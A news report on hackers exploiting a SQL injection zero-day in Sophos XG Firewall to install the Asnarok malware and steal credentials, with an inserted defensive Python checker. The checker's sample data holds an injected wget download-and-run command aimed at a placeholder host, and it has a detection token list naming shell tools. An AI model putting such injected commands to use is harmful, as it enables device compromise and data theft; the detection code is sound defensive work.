Hackers are exploiting SQL injection zero-day flaw in Sophos XG Firewall

Cyber-security firm Sophos has released an emergency security update to fix a zero-day vulnerability that has been exploited by hackers to drop malware on its XG Firewall devices.

The company said the attack on XG Firewall appliances was uncovered on April 22 after a suspicious field value was discovered in a device’s management interface. Further investigation revealed a previously unknown SQL injection vulnerability that led to remote code execution on some of Sophos’ firewall products.

According to the vendor, the coordinated attack conducted by an unknown threat actor targeted “systems configured with either the administration interface (HTTPS admin service) or the user portal exposed on the WAN zone” with an intention to steal sensitive information from the firewall.

“Customers with impacted firewalls should assume the data was compromised. The data exfiltrated for any impacted firewall includes all local usernames and hashed passwords of any local user accounts. For example, this includes local device admins, user portal accounts, and accounts used for remote access. Passwords associated with external authentication systems such as Active Directory (AD) or LDAP were not compromised,” the company said in the initial version of its advisory.

In a subsequent report providing technical details about the attack, Sophos said that the attacker exploited the SQL injection vulnerability to insert a one-line command into the firewall database. This command caused affected devices to download a Linux shell script named Install.sh from a remote server. The script then executed more SQL commands and dropped more files onto the virtual file system.

“The Install.sh script, initially, ran a number of Postgres SQL commands to modify or zero out the values of certain tables in the database, one of which normally displays the administrative IP address of the device itself. It appears that this was an attempt to conceal the attack, but it backfired: On some appliances, the shell script’s activity resulted in the attacker’s own injected SQL command line being displayed on the user interface of the firewall’s administrative panel. In place of what should have been an address, it showed a line of shell commands,” the vendor explained.
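The attack was noticed because a field that should hold the device's administrative IP address instead displayed a line of shell commands. As an added example, not code from Sophos or from this article, the Python below is a defender-side integrity check over rows of a configuration table (table and column names, and the sample rows, are constructed): every value that is supposed to be an IP address is classified, so an injected command line or a zeroed-out field stands out.

```python
# Added example: integrity check for configuration fields that must hold IP addresses.
# Table/column names and sample values are constructed, not the real XG schema.
import ipaddress
from typing import Iterable, List, Tuple

# Tokens that never belong in an address field; seeing them there is a strong
# sign the row was overwritten through an injected SQL statement.
SUSPICIOUS_TOKENS = ("|", ";", "&&", "$(", "`", "wget", "curl", "sh ", ".sh", "http://", "https://")


def classify_address_field(value: str) -> str:
    """Return 'ok', 'empty', 'suspicious' or 'malformed' for a value expected to be an IP address."""
    text = value.strip()
    if text in ("", "0", "0.0.0.0"):
        # The script zeroed out table values; a cleared admin IP is itself worth a look.
        return "empty"
    try:
        ipaddress.ip_address(text)
        return "ok"
    except ValueError:
        pass
    lowered = text.lower()
    if any(tok in lowered for tok in SUSPICIOUS_TOKENS):
        return "suspicious"
    return "malformed"


def audit_rows(rows: Iterable[Tuple[str, str, str]]) -> List[Tuple[str, str, str]]:
    """rows are (table, column, value); returns (table, column, verdict) for every row that is not 'ok'."""
    findings = []
    for table, column, value in rows:
        verdict = classify_address_field(value)
        if verdict != "ok":
            findings.append((table, column, verdict))
    return findings


# Constructed sample rows standing in for a dump of the firewall's configuration table.
SAMPLE_ROWS = [
    ("config", "admin_ip", "192.168.1.1"),
    ("config", "mgmt_ip", ""),
    ("config", "portal_ip", "; wget -O /tmp/x http://placeholder.invalid/Install.sh; sh /tmp/x"),
    ("config", "syslog_ip", "10.0.0.256"),
]

if __name__ == "__main__":
    for table, column, verdict in audit_rows(SAMPLE_ROWS):
        print(f"{table}.{column}: {verdict}")
```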

It appears that the malware used in the attack (which Sophos has dubbed Asnarok) retrieves only information resident on the firewall: the firewall’s license and serial number; a list of the email addresses of user accounts stored on the device, followed by the primary email address of the firewall’s administrator account; firewall users’ names, usernames, the encrypted form of their passwords, and the salted SHA256 hash of the administrator account’s password (passwords were not stored in plain text); and a list of the user IDs permitted to use the firewall for SSL VPN and of accounts permitted to use a “clientless” VPN connection.

The company says customers whose firewalls have not been compromised do not need to take any action. Customers notified that their firewalls were targeted in this attack are advised to take additional remediation steps, which include resetting device administrator accounts and rebooting XG devices.
